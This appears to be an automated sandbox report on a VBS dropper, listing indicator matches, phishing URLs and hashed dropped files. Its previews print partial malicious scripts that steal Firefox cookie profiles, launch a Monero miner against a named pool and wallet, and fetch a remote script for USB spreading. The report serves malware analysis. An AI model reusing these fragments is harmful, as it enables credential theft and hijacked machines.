                                                          ViLFvmx6xk.exeGet hashmaliciousRedLineBrowse
                                                          • 172.65.251.78
                                                          www.7-zip.org7z2201_setup.msiGet hashmaliciousUnknownBrowse
                                                          • 49.12.202.237
                                                          .........vbsGet hashmaliciousUnknownBrowse
                                                          • 49.12.202.237

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSSWIFT05062023.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 162.159.137.232
                                                          https://t.email.currys.co.uk/r/?id=h7aa4a341,8b3374d,743904&p1=concretocasa.com.br%2Fhtml%2Fssl%2Ffyvqcw/anBlcmtpbnNAaGFycmlzd2lsbGlhbXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.16.126.175
                                                          https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=QuGBQKkE202XUxH-a0a_31t9L-AKA-hDuT6jUCbQfK9UOTBVMkpERFE0M1JPOVcyN1NOSVU1VU1OUS4uGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.18.10.207
                                                          https://www.bing.com/ck/a?!&&p=6e9dcf551f0e9608JmltdHM9MTY4NTkyMzIwMCZpZ3VpZD0xYzFjMDg1MS1hYmE2LTY4ZTItMDE2Yi0xYjcyYWE0ODY5MDQmaW5zaWQ9NTE2Mg&ptn=3&hsh=3&fclid=1c1c0851-aba6-68e2-016b-1b72aa486904&u=a1aHR0cDovL2dlY2tvY2VyYW1pY3MuY28ua2Uv#bHVjaWFuYWdAZ3VsZnN0cmVhbW1hcmluZS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          https://1drv.ms/o/s!BJGtiAXrkAT5sHKaA7Q3uiRSCQWt?e=BnSDr3RKSUKQc9YPYENGmQ&at=9Get hashmaliciousHTMLPhisher, SharepointPhisherBrowse
                                                          • 104.18.11.207
                                                          https://1drv.ms/o/s!AjqtXAyN5UCSgRgQFIvIhHjCCJjt?e=HlipCNGet hashmaliciousUnknownBrowse
                                                          • 104.16.123.96
                                                          PROPOSAL.emlGet hashmaliciousHTMLPhisherBrowse
                                                          • 172.67.185.88
                                                          https://1uvb4gp37m-teamsharpoin2-sbs.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wappGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          https://pub-b2955bd5cc5a447cba7f9017e8915538.r2.dev/webmail.html#support@midlandcomputers.comGet hashmaliciousHTMLPhisherBrowse
                                                          • 172.67.155.92
                                                          http://metahelpid812374812344411.comGet hashmaliciousUnknownBrowse
                                                          • 104.18.16.182
                                                          https://www.bing.com/ck/a?!&&p=c5bd7fb5e432c63eJmltdHM9MTY4MjQ2NzIwMCZpZ3VpZD0wNDVjZTI0Ny0wZGFkLTY5YTktMmI1ZS1mMGI0MGMyNjY4YjEmaW5zaWQ9NTIyMA&ptn=3&hsh=3&fclid=045ce247-0dad-69a9-2b5e-f0b40c2668b1&u=a1aHR0cHM6Ly9nYXJhbmRndXkuY29tL3RlYW0v#M=blablabla@blibliblo.orgGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.7
                                                          https://flying-swift-amaryllis.glitch.me/?id=bderville@norauto.comGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          https://protect-us.mimecast.com/s/rSy2Crk5YKF2ADjnF7Z1mv?domain=1drv.msGet hashmaliciousUnknownBrowse
                                                          • 104.21.92.28
                                                          file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 104.18.8.146
                                                          https://bit.ly/45JVb3RGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          PV Questionnaire - Order Fulfillment and Supporting IT.docxGet hashmaliciousUnknownBrowse
                                                          • 104.18.169.114
                                                          sP5ZYLQ4X2.exeGet hashmaliciousEternity StealerBrowse
                                                          • 172.67.34.170
                                                          Anon.htmlGet hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 104.21.56.85
                                                          https://xxhdfilm.online/807774-/25D8/25AE-%D9%85-%D8%B4-%D9%84%D9%84%D8%AA%D9%85%D9%88%D9%8A%D9%84-%D8%A7%D9%84%D9%88%D9%81%D8%A7%D9%82-%D8%B4%D8%B1%D9%83Get hashmaliciousUnknownBrowse
                                                          • 188.114.96.3

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19ornot.exeGet hashmaliciousUnknownBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          Athermous.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          A08000143_ESP_B64891013_ESP_823041009945_20230405.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          shipping_documents.docx.docGet hashmaliciousHTMLPhisherBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          EXTRACTO_BANCARIO.PDF.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          RFQ-06062023.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          FOB $Corporation new Order.docxGet hashmaliciousUnknownBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          mallox.bin.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          tu6VhUORSY.exeGet hashmaliciousRedosdruBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          file.exeGet hashmaliciousDjvuBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          Sii_NopagadaFacMarzo.msiGet hashmaliciousUnknownBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          Document_5_june_54687.exeGet hashmaliciousUnknownBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          doc7f6ce54a31c775a60c96c262f18bc698.xlsxGet hashmaliciousNetSupport RATBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          Factmarzosiinopagada.msiGet hashmaliciousUnknownBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          rFishhook_1_.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          facturanopagamarzoSii.msiGet hashmaliciousUnknownBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          Archd.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          Omnormeredes.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78
                                                          Omnormeredes.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 49.12.202.237
                                                          • 172.65.251.78

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\Public\WindowsUpdate\WinRing0x64.sysfile.exeGet hashmaliciousMinerDownloader, RedLine, SystemBC, Vidar, XmrigBrowse
                                                            file.exeGet hashmaliciousXmrigBrowse
                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                http://c3poolbat.oss-accelerate.aliyuncs.com/autoc3pool.batGet hashmaliciousXmrigBrowse
                                                                  KbvbKHTTZw.exeGet hashmaliciousAmadey, Fabookie, XmrigBrowse
                                                                    file.exeGet hashmaliciousAmadey, Fabookie, XmrigBrowse
                                                                      file.exeGet hashmaliciousAmadey, Fabookie, XmrigBrowse
                                                                        AB7JQ1vKDq.exeGet hashmaliciousMinerDownloader, Nymaim, RedLine, Vidar, XmrigBrowse
                                                                          file.exeGet hashmaliciousMinerDownloader, Nymaim, RedLine, Vidar, XmrigBrowse
                                                                            01587199.exeGet hashmaliciousXmrigBrowse
                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                  WBbpHdzL2H.exeGet hashmaliciousAmadey, Fabookie, XmrigBrowse
                                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                                      zmklrtudGu.exeGet hashmaliciousAmadey, Fabookie, XmrigBrowse
                                                                                        LauncherPC.exeGet hashmaliciousLaplas Clipper, Vidar, XmrigBrowse
                                                                                          GameBar.exeGet hashmaliciousXmrigBrowse
                                                                                            file.exeGet hashmaliciousMinerDownloader, RedLine, Vidar, XmrigBrowse
                                                                                              633.exeGet hashmaliciousXmrigBrowse
                                                                                                jsx11Y8GcB.exeGet hashmaliciousXmrigBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\Public\7g.exe

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):584704
                                                                                                  Entropy (8bit):6.635079012262598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:trKhRhfkjdw4HKcZDhysKJ1npqCC6BzHtP4iFO+:treJSwIKIysk1nxbVHtdO+
                                                                                                  MD5:F7D5BA4EC2A88F2FF1F0ABEC61108A0B
                                                                                                  SHA1:73EC819230F0C03B46A97FB3A9DEA013151874EA
                                                                                                  SHA-256:89FE813D8A27CCC7F261E32BF1ACD605D55523579C3C0662104C083BFE710D8B
                                                                                                  SHA-512:7AD2C62BB0318841A86DCDBA6F82F4EA7515245D4C9CDE08CB807748BDAE4DE43E4729CA84D8DAA164DD567717CB0AAF49B24E9B5AB6BF31B1418B8144B3B77A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.r.............f.......r...............r.......r.........C...............A.....+..............+........g......................Rich............PE..L.....Wd.................t........................@.......................................@.................................$...x.... .......................0...L......................................................4............................text....r.......t.................. ..`.rdata...............x..............@..@.data....j..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...V...0...X..................@..B................................................................................................................................................................................................................................................

                                                                                                  C:\Users\Public\WindowsUpdate\Update.xml

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2794
                                                                                                  Entropy (8bit):3.549190186621027
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:yei1q9tRQSRiMyVwTvara+iaiudupRCRf9ufAuRa7T5XHPsV8i59rQt+++:ttRdRi1WGdiaigV9ll7dHFSQ+
                                                                                                  MD5:21D6C92F3AA287A7BAE667DC3618909E
                                                                                                  SHA1:E09887D505C41E205ADCDFC79A3203BFA9D735B2
                                                                                                  SHA-256:90EA3B7C2B00D4BD10E180777FFDAEA8037DA06208906DBE923AD7207F95C59F
                                                                                                  SHA-512:907E24370DDE2DDECA4007FA563241280571AED2640C367645C859AA375431A88605CA18A775B3B346436C5DB9E9DD53A7D4D8E8E6EAE95DC0605B13BC721171
                                                                                                  Malicious:true
                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.1.0.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.3.-.0.2.-.0.5.T.1.4.:.3.1.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.T.i.m.e.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.S.e.t.t.i.n.g.s.>..... . . . .<.M.u.l.t.i.p.l.e.I.n.s.t.a.n.c.e.s.P.o.l.i.c.y.>.I.g.n.o.r.e.N.e.w.<./.M.u.l.t.i.p.l.e.I.n.s.t.a.n.c.e.s.P.o.l.i.c.y.>..... . . . .<.D.

                                                                                                  C:\Users\Public\WindowsUpdate\WinRing0x64.sys

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14544
                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n, Description: Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, Source: C:\Users\Public\WindowsUpdate\WinRing0x64.sys, Author: Florian Roth
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                  • Filename: KbvbKHTTZw.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: AB7JQ1vKDq.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: 01587199.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: WBbpHdzL2H.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: zmklrtudGu.exe, Detection: malicious, Browse
                                                                                                  • Filename: LauncherPC.exe, Detection: malicious, Browse
                                                                                                  • Filename: GameBar.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: 633.exe, Detection: malicious, Browse
                                                                                                  • Filename: jsx11Y8GcB.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\Public\WindowsUpdate\go.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                  Category:dropped
                                                                                                  Size (bytes):226816
                                                                                                  Entropy (8bit):7.8690577923377445
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:S11ynIPsj6sBu8eDJc+SkXe8UmV7Mrra8kyQWmqdJW0bx:SAIPsj6sBCdskXCmVo3kyQLeRbx
                                                                                                  MD5:D418273816199870DE1A16C99702A6CF
                                                                                                  SHA1:92549DDA7BBCAC5EB3CC17C8FF3618C444F82AD3
                                                                                                  SHA-256:5ACF2688DBC6E2078D19AD7580BC06C61BF4DA9C81731738659E2A4A2C045F0B
                                                                                                  SHA-512:34400D0114E9300AAC9C4B0F858376B19FF6F1A00465C424CF3CEF55200204641ABE2F413CE7CA047A49CB981E31EF6C532CA216CB8B28AE362DA251A3E55AFC
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4..4..4..;...4..;...4......4.7...4..4.5.....4....4....4....4.Rich.4.................PE..L.....Jc.................P...0.......Z.......`....@.............................................................................X....`..."..........................................................................................................UPX0....................................UPX1.....P.......L..................@....rsrc....0...`...&...P..............@..............................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

                                                                                                  C:\Users\Public\WindowsUpdate\mozilla.vbs

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4428
                                                                                                  Entropy (8bit):5.0675742940767075
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:hGzQkmSN/YdJpJOwmX+n4dWzqG5/heHapYHZ7neI+:hImc/aLR5/heHhneI+
                                                                                                  MD5:940BECD4A93648C673BF2D62EA2EA381
                                                                                                  SHA1:3E5C32C433F2D2178053584A9607E833ADD4F8C8
                                                                                                  SHA-256:DE5484BEA391CF374E60A7492C7BCD9C12FA8E3185A1A0C1EBC0155701C5AFA5
                                                                                                  SHA-512:3B56FB492B19310F5DD33A989E979CE728D587755C78C65843C604EC23953D51BF5F532BAEE656F60374A372C37F2806888B722DDC65290A81478E3F83658842
                                                                                                  Malicious:true
                                                                                                  Preview:dim profiles(100)..cpt_profile=0....set objFso = CreateObject("Scripting.FileSystemObject")..Set oShell = CreateObject( "WScript.Shell" )..appdata=oShell.ExpandEnvironmentStrings("%appdata%") ..TraverseFolders appdata....Sub ZipFolder (sFolder,zipFile).. on error resume next.. With CreateObject("Scripting.FileSystemObject").. zipFile = .GetAbsolutePathName(zipFile).. sFolder = .GetAbsolutePathName(sFolder).... With .CreateTextFile(zipFile, True).. .Write Chr(80) & Chr(75) & Chr(5) & Chr(6) & String(18, chr(0)).. End With.. End With.... With CreateObject("Shell.Application").. .NameSpace(zipFile).CopyHere .NameSpace(sFolder).Items.. Do Until .NameSpace(zipFile).Items.Count = _.. .NameSpace(sFolder).Items.Count.. WScript.Sleep 1000 .. Loop.. End With....End Sub....Function TraverseFolders(f)..set fldr = objFso.GetFolder(f)..if objFso.fileexists(f+"\cookies.sqlite") and objFso.fileexists(

                                                                                                  C:\Users\Public\WindowsUpdate\mservice.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4770304
                                                                                                  Entropy (8bit):6.649403136807024
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:4XCVqZY5SVIhbh1A8K/drFfV6I8NXpBtkuzDS8VvazdNBi/:VVqJkI89pBTDS8NeNi/
                                                                                                  MD5:CFC0000B993A31C11EF58AC53837E4E1
                                                                                                  SHA1:750752B9C20C6BAC25C172FC5A0645CC7D631457
                                                                                                  SHA-256:47D70838CBEDC8B0E0634E51BDE8A72035922BDDC1177CC9210FA0ADB967D6A2
                                                                                                  SHA-512:BF03704F5E363940328112825976B78BE50E4A8BE2A64D50EB71E1EC016946F9D6DD256ECD2B87105AE45614982351B27AE99A53284321C3EBBC16CE316B960E
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth (Nextron Systems)
                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: ditekSHen
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........=...\...\...\...7...\...7...\...3{..\...)...\...)...\...)...\...7...\...)...\...7...\...\...]...)...^...)...\...)...\...)y..\...\...\...)...\..Rich.\..........................PE..d....dc..........".......4...>.......0........@............................. s......jI...`.................................................|tE.......r......@p.<.............r.h{..@.B.......................B.(...`.B.8............ 4..............................text.....4.......4................. ..`.rdata...u... 4..v....4.............@..@.data...4.*...E.......E.............@....pdata..<....@p......"F.............@..@_RANDOMXV.... r.......G.............@..`_TEXT_CN.&...0r..(....H.............@..`_TEXT_CN.....`r......4H.............@..`_RDATA........r......FH.............@..@.rsrc.........r......HH.............@..@.reloc..h{....r..|...NH.............@..B................................

                                                                                                  C:\Users\Public\WindowsUpdate\mservice.vbs

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1568
                                                                                                  Entropy (8bit):5.533375448529494
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:bCqIXN2pAMTEgPFtM41PKk+EfYg+1TK/AFhHqITUzF+Z+5H0TOWq/AnhskYn9DWo:HQgPFtMLkfQVNE2KIqF+I5HwkgzYb
                                                                                                  MD5:5CF1145271785A3EA252129F0728ED7B
                                                                                                  SHA1:12FA9C83FD793E51A25723BE91E66EAC7199EE6B
                                                                                                  SHA-256:C20D2A220F7429FA128671A5E2187B5C52821BEFDD48379E44788820FAB89E96
                                                                                                  SHA-512:B27F7489E7330D9910BE5A2E401C9B0B7A8371CCBD2EED857F04C2F5845AAA9CA65238452AD59680750DD5A7FA7C3BF37125CED2579431C63DED9344744FD7DD
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Users\Public\WindowsUpdate\mservice.vbs, Author: Florian Roth (Nextron Systems)
                                                                                                  Preview:Function LPad (str, pad, length).. LPad = String(length - Len(str), pad) & str..End Function....set L5ofL5 = CreateObject("Scripting.FileSystemObject")..if not L5ofL5.FileExists("c:\users\public\log.dat") then ..set f = L5ofL5.CreateTextFile("c:\users\public\log.dat",True)..f.Write LPad(day(now), "0", 2)+LPad(month(now), "0", 2)+"-"+LPad(hour(now), "0", 2)+"h"+LPad(minute(now), "0", 2)+"m"..f.close..end if..set f2 = L5ofL5.OpenTextFile("c:\users\public\log.dat")..d = f2.ReadLine..f2.Close....Dim objWMIService, objComputer, colComputer ..Set objWMIService = GetObject("winmgmts:"& "{impersonationLevel=impersonate}!\\.\root\cimv2") ..Set colComputer = objWMIService.ExecQuery("Select * from Win32_ComputerSystem") ..For Each objComputer in colComputer ..ram = objComputer.TotalPhysicalMemory/(1024*1024)..Next ..if ram > 4096 then ..mode="auto"..Else..mode="light"..end if....command0 = """%public%\windowsupdate\mservice.exe"" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8h

                                                                                                  C:\Users\Public\WindowsUpdate\ps.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):402944
                                                                                                  Entropy (8bit):6.666814366272581
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:QNV8uoDRSdm3v93UFlssFHgkU9KvKUXr/BAO9N/oXrsAteTQokizYu:eSDRSm3vrugB9KvKk9RO8k3u
                                                                                                  MD5:2024EA60DA870A221DB260482117258B
                                                                                                  SHA1:716554DC580A82CC17A1035ADD302C0766590964
                                                                                                  SHA-256:53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
                                                                                                  SHA-512:FFCD4436B80169BA18DB5B7C818C5DA71661798963C0A5F5FBAC99A6974A7729D38871E52BC36C766824DD54F2C8FA5711415EC45799DB65C11293D8B829693B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\Public\WindowsUpdate\ps.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................9.......9............... ......................;.......;.......;......Rich............PE..L....hy`.....................P......,i............@..................................................................................@..................................................................................p............................text............................... ..`.rdata..............................@..@.data..............................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\Public\WindowsUpdate\sarmat.vbs

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                  File Type:assembler source, ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2559
                                                                                                  Entropy (8bit):5.054358680199897
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PbR2Hk8fSRgDmgTzlREzXacPeIpLVdxpDnBmKhRhFI/nwvvZiOrA7BehBqnHOW+x:PbR2HtfUoxflREzXacGYzxBWCRpXMunx
                                                                                                  MD5:08AD7921EC11078118F3AEB89E177C3F
                                                                                                  SHA1:633197EE0570BA80CFE2358BBC483B64D84E838B
                                                                                                  SHA-256:E66DA8042513B237CE1BE98A5291C61ADE2A8EBDB87B6AEB4EB9E200B38AFC53
                                                                                                  SHA-512:009FE96D10FBCD751C41B7738D7E7C2748DF0F0F4C6A206C973E19D93116DE5D4906568236EC904B74302D12467126B383F3980E3351DCCD6F0232B211ABD061
                                                                                                  Malicious:false
                                                                                                  Preview:.sub L5dwlL5(L5uL5, L5sL5).dim L5xL5: Set L5xL5 = createobject("Microsoft.XMLHTTP").dim L5bL5: Set L5bL5 = createobject("Adodb.Stream").L5xL5.Open "GET", L5uL5, False.L5xL5.Send..with L5bL5. .type = 1 '//binary. .open. .write L5xL5.responseBody. .savetofile L5sL5, 2 '//overwrite.end with.end sub..url = "https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false"...on error resume next..sub listDrives.dim drives(100).dim labels(100).i=0.Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")..Set colDisks = objWMIService.ExecQuery ("Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4").For Each objDisk in colDisks. letter = objDisk.DeviceID..if fso.GetDrive(letter).isReady then...drives(i)=letter. labels(i)=fso.GetDrive(letter).volumename...i=i+1..end if.Next.Set colShares = objWMIService.ExecQuery("Select * from Win32_Share where not name like '%$%'")..For each objShare in colShares.sharedfolder

                                                                                                  C:\Users\Public\gmail.7z

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                  File Type:7-zip archive data, version 0.4
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1960608
                                                                                                  Entropy (8bit):7.999903958520937
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:49152:cUXIV4OGLOd2YHtcmQL/IEP2g3Pg/1oVkZkS:cUXI9H+7VVrkeS
                                                                                                  MD5:D674B5A2A7159B838ADE554C35E15E1D
                                                                                                  SHA1:EDE9027E85C6FE270FA99F6C8597DDC24193C470
                                                                                                  SHA-256:7F5ED3342BCD240C07500B3147C8CAEA27264A936250A29AE4C85BAAE47C4906
                                                                                                  SHA-512:57FB778CC5A0252DC5AA486A424305AAC36E2B20F6BBC2F49C14244B23492DE290C981A56A31D08FD56956657531F767161C527F7255EA1EE5C21EAD9E68E36C
                                                                                                  Malicious:true
